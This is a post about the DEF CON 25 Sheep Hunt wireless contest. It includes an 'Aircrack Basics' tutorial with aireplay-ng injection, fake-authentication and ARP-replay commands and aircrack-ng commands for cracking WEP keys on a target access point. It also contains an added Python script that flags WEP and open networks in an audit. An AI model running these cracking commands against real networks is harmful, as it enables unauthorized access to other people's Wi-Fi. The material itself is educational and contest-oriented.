2017-07-27

DEFCON 25: SHEEP HUNT 2017



SHEEP HUNT 2017
The Wall of Sheep (WOS)
Packet Hacking Village (PHV)

It is time to scour the DEF CON airwaves for lost SHEEPS. Collect clues by playing and solving the different Sheep Hunt challenges.  ALL SKILL LEVELS ARE WELCOME! From n00b to 1337!


GEAR NEEDED
     Laptop w/ Kali + wireless sniffing capabilities
     RF Devices - RTL-SDR, HackRF One, Ubertooth, YARD Stick One…
     iPhone / Android w/ QR code and/or RFID scanner apps

USE OUR GEAR:

We get it! Who in their right mind would scan DEF CON’s wireless networks?  Ask a Sheep Hunt volunteer, and we’ll get you started.  (First come, first served. Gear is loaned for a limited time.)

THE SHEEP LIST

1. QR: Hunt for QRCodes and scan for clues! Earn points by deciphering the clues.  *QRCode scanner apps work in AIRPLANE MODE or with your mobile data turned off.

2. NFC: Hunt for NFC tags hidden in the PHV, the Wall of Sheep, or on PHV staff.  Earn points by deciphering the clues.  *NFC scanner apps should work in AIRPLANE MODE or with your mobile data off.

3. RF: Hunt for RF beacons hidden around the DEF CON hallways. Use our military-grade RF gear.  Listen and decipher the secret messages by using RF scanners.

4. AP: Find the correct SHEEP HUNT APs and start cracking.   Every key you crack & submit earns you points.  Clues to identify the correct APs are in the QR, NFC and RF challenges.


For hints follow @wallofsheep on Twitter

Hashtag #WOSSH #PHV #WOS

DEFCON 25: Aircrack Basics


NOTE: The instructions below are for concept learning and education purposes only. It is illegal to hack an access point without the owner’s consent.

PHASE 1 – Monitor Mode

OPEN A TERMINAL WINDOW (Terminal 1)

1.    Set your wireless interface to monitor mode:
airmon-ng start [interface]
2.    Start monitoring the wireless traffic, and save it to a file:
airodump-ng -w [filename] [interface]

PHASE 2 – Generate IVs

OPEN A SECOND TERMINAL WINDOW (Terminal 2)

1.    Generate IVs (Initialization Vectors) by using “aireplay-ng”.
2.    Type: aireplay-ng --help to see the syntax and switches.
3.    Test the target’s ability to accept packet injection, type:
aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
- The ideal outcome is a 100% injection result.
4.    List the aireplay-ng help to view the attack modes available.  Be patient and creative. Here are some examples:

Fake Authentication with target AP

Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]


Standard ARP-request replay

aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

PHASE 3 – Cracking

OPEN A THIRD TERMINAL WINDOW (Terminal 3)
1.    Start cracking, type: aircrack-ng [filename] – [filename] is the location and name of the capture file being written in Terminal 1.

2.    Pick the target SSID to start cracking.

OR use WIFITE
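
The IV-based cracking in Phases 2 and 3 only works against WEP, so a capture of a network you are responsible for should show no WEP (or open) access points. The added example below, which is not part of the original post, reads the CSV summary that airodump-ng -w writes next to the capture file and lists such access points; the column layout is assumed from airodump-ng's CSV output, and every MAC and SSID in the sample is constructed.

```python
import csv
import io

# Constructed sample in the layout of airodump-ng's [filename]-01.csv
# (column order is an assumption; all MACs and SSIDs are made up).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:00:01, 2017-07-27 10:00:01, 2017-07-27 10:05:00,  6,  54, WEP, WEP, , -48, 310, 41250,   0.  0.  0.  0,  10, lab-legacy,
02:00:00:AA:00:02, 2017-07-27 10:00:02, 2017-07-27 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 295, 0,   0.  0.  0.  0,  8, lab-wpa2,
02:00:00:AA:00:03, 2017-07-27 10:00:03, 2017-07-27 10:05:00,  1,  54, OPN, , , -60, 280, 0,   0.  0.  0.  0,  9, lab-guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:BB:00:01, 2017-07-27 10:00:05, 2017-07-27 10:05:00, -40, 120, 02:00:00:AA:00:01, lab-legacy
"""


def audit_access_points(csv_text):
    """Return one finding per access point that advertises WEP or no encryption."""
    findings = []
    header = None
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if not any(cells):
            if header:      # blank line after the AP table: station table follows
                break
            continue        # leading blank line before the header
        if header is None:
            if cells[0] != "BSSID":
                raise ValueError("input does not look like an airodump-ng CSV")
            header = cells
            continue
        ap = dict(zip(header, cells))
        privacy = ap.get("Privacy", "").split()   # e.g. "WPA2 WPA" lists two modes
        if "WEP" in privacy:
            issue = "WEP"
        elif "OPN" in privacy:
            issue = "open"
        else:
            continue
        findings.append({
            "bssid": ap["BSSID"],
            "essid": ap.get("ESSID", ""),
            "issue": issue,
            "ivs": int(ap.get("# IV") or 0),  # encrypted data frames seen so far
        })
    return findings


if __name__ == "__main__":
    for finding in audit_access_points(SAMPLE_CSV):
        print(finding)
```

Any access point this reports as WEP should be moved to WPA2 or later, since no key length makes WEP resistant to the procedure above.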

2017-07-16

DEFCON 25: Ides of Defcon Badge

Unlock Codes?! Yes please! Let the games begin... details to follow after the con....